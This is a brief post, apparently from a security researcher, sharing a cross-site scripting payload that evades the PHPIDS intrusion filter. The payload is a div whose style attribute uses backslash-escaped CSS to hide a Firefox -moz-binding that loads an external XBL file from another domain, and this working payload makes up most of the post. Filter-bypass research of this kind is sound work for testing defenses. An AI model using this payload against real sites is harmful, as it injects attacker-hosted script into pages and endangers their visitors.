Hacking the PHPIDS again I found some cool XSS:- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business \i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> I’ve moved it onto two lines for correct display. Who’d have thought that Firefox would allow all that within the url and CSS properties 😀